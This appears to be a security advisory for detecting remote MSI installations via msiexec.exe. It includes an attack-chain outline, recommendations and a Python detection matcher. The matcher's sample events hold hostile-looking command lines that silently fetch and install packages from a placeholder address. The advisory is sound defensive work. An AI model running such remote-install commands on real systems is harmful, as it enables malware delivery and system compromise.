Threat Feed
Advisory severity: high

Potential Remote Install via MsiExec

This rule detects attempts to install a file from a remote server using MsiExec, a technique adversaries abuse to deliver malware. It identifies msiexec.exe processes that run with arguments indicative of a remote installation and are spawned by suspicious parent processes.

Adversaries may abuse Windows Installer (msiexec.exe) to perform remote installations of malicious payloads. This technique is used for initial access, defense evasion, and execution of arbitrary code. The detection rule identifies attempts to install a file from a remote server using MsiExec. The rule looks for msiexec.exe processes running with arguments such as -i, /i, -p, or /p, indicative of remote installations, and executed from suspicious parent processes like sihost.exe, explorer.exe, cmd.exe, wscript.exe, mshta.exe, powershell.exe, wmiprvse.exe, pcalua.exe, forfiles.exe, and conhost.exe. The rule includes exceptions to reduce false positives from legitimate software installations, specifically excluding command lines containing --set-server, UPGRADEADD, --url, USESERVERCONFIG, RCTENTERPRISESERVER, app.ninjarmm.com, zoom.us/client, SUPPORTSERVERSTSURI, START_URL, AUTOCONFIG, awscli.amazonaws.com, */i \"C:*, and */i C:\\*. This technique can lead to complete system compromise and data exfiltration.
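The rule logic described above, as an added example that is not the platform's own Sigma query (the queries are not shown on this page): a small matcher run over constructed Sysmon Event ID 1-style records. The field names (Image, ParentImage, CommandLine), the regular expressions, and the requirement that an http:// or https:// URL appear in the command line are assumptions made to approximate the description.

```python
import re

# Parent processes the advisory lists as suspicious launchers of msiexec.exe
SUSPICIOUS_PARENTS = {
    "sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe",
    "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe",
}
# Install (-i, /i) or patch (-p, /p) switches, as a standalone token (assumed regex)
INSTALL_SWITCHES = re.compile(r"(?:^|\s)[-/][ip](?:\s|$)", re.IGNORECASE)
# False-positive exclusions from the advisory, matched as case-insensitive substrings
EXCLUSION_SUBSTRINGS = (
    "--set-server", "UPGRADEADD", "--url", "USESERVERCONFIG", "RCTENTERPRISESERVER",
    "app.ninjarmm.com", "zoom.us/client", "SUPPORTSERVERSTSURI", "START_URL",
    "AUTOCONFIG", "awscli.amazonaws.com",
)
# Local-path installs (`/i "C:...` or `/i C:\...`) are excluded as well
LOCAL_INSTALL = re.compile(r'/i\s+"?C:\\', re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)  # assumption: HTTP(S) source

def is_suspicious_remote_install(event: dict) -> bool:
    """Return True when a process_creation event matches the rule as described."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    if image != "msiexec.exe" or parent not in SUSPICIOUS_PARENTS:
        return False
    if not INSTALL_SWITCHES.search(cmd) or not REMOTE_URL.search(cmd):
        return False
    lowered = cmd.lower()
    if any(s.lower() in lowered for s in EXCLUSION_SUBSTRINGS) or LOCAL_INSTALL.search(cmd):
        return False
    return True

# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation address
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "msiexec.exe /i http://203.0.113.10/update.msi /qn"},  # remote + silent: alert
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'msiexec.exe /i "C:\\Users\\jdoe\\Downloads\\tool.msi"'},  # local path: no alert
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "msiexec.exe /i https://zoom.us/client/latest/ZoomInstallerFull.msi /qn"},  # excluded
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "msiexec.exe /p https://203.0.113.10/patch.msp"},  # parent not in the suspicious set
]

def triage(events):
    """Return the command lines of the events that should raise an alert."""
    return [e["CommandLine"] for e in events if is_suspicious_remote_install(e)]

print(triage(SAMPLE_EVENTS))
```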

Attack Chain

  1. An attacker gains initial access via an unspecified method (e.g., phishing, exploit).
  2. The attacker uses a script or command-line interpreter (e.g., cmd.exe, powershell.exe) to initiate the msiexec.exe process.
  3. The msiexec.exe process is launched with arguments that specify a remote MSI package (-i, /i, -p, /p) and enable silent installation (/qn, -qn, -q, /q, /quiet).
  4. The msiexec.exe process downloads the MSI package from a remote server over HTTP or HTTPS.
  5. msiexec.exe executes the downloaded MSI package, which may contain malicious payloads.
  6. The malicious payload executes, potentially performing actions such as installing malware, establishing persistence, or escalating privileges.
  7. The attacker gains control over the compromised system.
  8. The attacker performs further actions, such as data exfiltration or lateral movement.

Impact

Successful exploitation can lead to arbitrary code execution, allowing attackers to install malware, steal sensitive data, or disrupt system operations. A compromised system can be used as a pivot point to access other systems on the network. The impact can range from data breaches and financial losses to reputational damage and disruption of critical services. The number of potential victims depends on the scope of the initial access and the attacker’s objectives.

Recommendation

  • Deploy the provided Sigma rule to your SIEM to detect suspicious MsiExec invocations with remote payloads.
  • Enable Sysmon process creation logging (Event ID 1) to ensure the required data is available for the Sigma rule.
  • Investigate any alerts generated by the Sigma rule, focusing on the parent process, command-line arguments, and network connections associated with the msiexec.exe process.
  • Monitor process execution events for child processes spawned by msiexec.exe for anomalous activity.
  • Implement application control policies to restrict the execution of msiexec.exe to authorized users and processes only.

Detection coverage (2 rules)

Detect MsiExec Remote Payload Installation

high

Detects MsiExec installing a package from a remote URL.

Format: Sigma | Tactics: defense_evasion | Techniques: T1218.007 | Sources: process_creation, windows

Detect MsiExec Running from Suspicious Parent Processes

medium

Detects MsiExec running from suspicious parent processes often used by attackers.

Format: Sigma | Tactics: defense_evasion | Techniques: T1218.007 | Sources: process_creation, windows
